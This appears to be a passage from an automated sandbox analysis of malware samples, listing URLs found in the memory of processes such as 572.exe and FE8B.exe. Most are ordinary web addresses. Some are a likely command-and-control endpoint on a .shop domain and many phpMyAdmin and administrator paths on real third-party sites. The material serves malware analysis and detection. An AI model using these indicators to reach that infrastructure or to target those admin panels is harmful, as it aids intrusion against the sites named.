                Source: 572.exe, 00000009.00000003.4390567048.00000000391A6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore/detail/kgjfgplpablkjnlkjmjdecgdpfankdle
                Source: 572.exe, 00000009.00000003.4199132686.0000000039116000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.0000000039116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cjdropshipping.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cjdropshipping.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cjdropshipping.com/phpmyadmin/H
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cjdropshipping.com/phpmyadmin/s
                Source: FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimconcessionrebe.shop/
                Source: FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimconcessionrebe.shop/api
                Source: FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimconcessionrebe.shop/apiT
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-api.arkoselabs.com/;
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud.simplify3d.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud.simplify3d.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud.simplify3d.com/phpmyadmin/h
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud.simplify3d.com/phpmyadmin/net7
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud.simplify3d.com/phpmyadmin/pd
                Source: 572.exe, 00000009.00000003.4298617897.0000000040427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cms2.mega.nz/b41537c0eae056cfe5ab05902fca322b.png
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cn.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4288860252.0000000063FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.3.1.slim.min.js
                Source: 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.5.1.min.js
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.zoom.com
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.zoom.com/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://connect.appen.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://connect.appen.com/phpmyadmin/2
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://connect.facebook.net
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4572467958.000000000595D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.12&appId=269882119846307&autoLogAppEven
                Source: 572.exe, 00000009.00000003.4337138614.000000004DB70000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp-reporting.cloudflare.com/cdn-cgi/script_monitor/report?m=2_zS2z5q4IP7tdk7qutJxWjpICOi2ek
                Source: 572.exe, 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                Source: 572.exe, 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                Source: 572.exe, 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cz.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://de.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.zoom.us/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.zoom.us/docs/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://devforum.zoom.us/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://devsupport.zoom.us/hc/en-us
                Source: 572.exe, 00000009.00000003.4307098588.0000000006240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/gc6bj3Y
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dk.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4306089773.000000004E73A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duanxin.baidu.com
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easygold.joyalukkas.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easygold.joyalukkas.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easygold.joyalukkas.com/phpmyadmin/2
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easygold.joyalukkas.com/phpmyadmin/Oz
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ee.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4464339832.000000004D829000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eei.uniandes.edu.co/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eei.uniandes.edu.co/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eei.uniandes.edu.co/phpmyadmin//$z
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eei.uniandes.edu.co/phpmyadmin/q
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://embed.tawk.to/5d39786f6d8083122839f511/default
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enterprise.snap.com;
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://es.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://etd.lib.tuke.sk/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://etd.lib.tuke.sk/phpmyadmin/s.google.com21e
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ev.zoom.us/
                Source: explorer.exe, 00000002.00000000.2127512556.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.u
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/docs/en-us/developer-support-plans.html
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/about/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/acceptable-use-guidelines/
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/accessibility
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/accessibility/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/audiences/av-facilities/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/audiences/cx/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/audiences/it-professionals/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/audiences/marketing-events/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/audiences/sales-revenue/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/audiences/small-business/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/collaboration-tools/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/contact
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/contactsales/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/conversational-intelligence/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/customer/all/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/global-services/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/hardware-purchase-options/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/industry/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/industry/education/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/industry/finance/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/industry/government/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/industry/healthcare/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/industry/manufacturing/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/industry/retail/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/livedemo/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/media-kit/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/privacy/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/appointment-scheduler/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/cmk/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/contactcenter/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/contactcenter/features/virtual-agent/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/contactcenter/features/workforce-engagement-management/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/email-calendar/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/event-platform/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/event-solutions/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/group-chat/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/meetings/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/online-whiteboard/
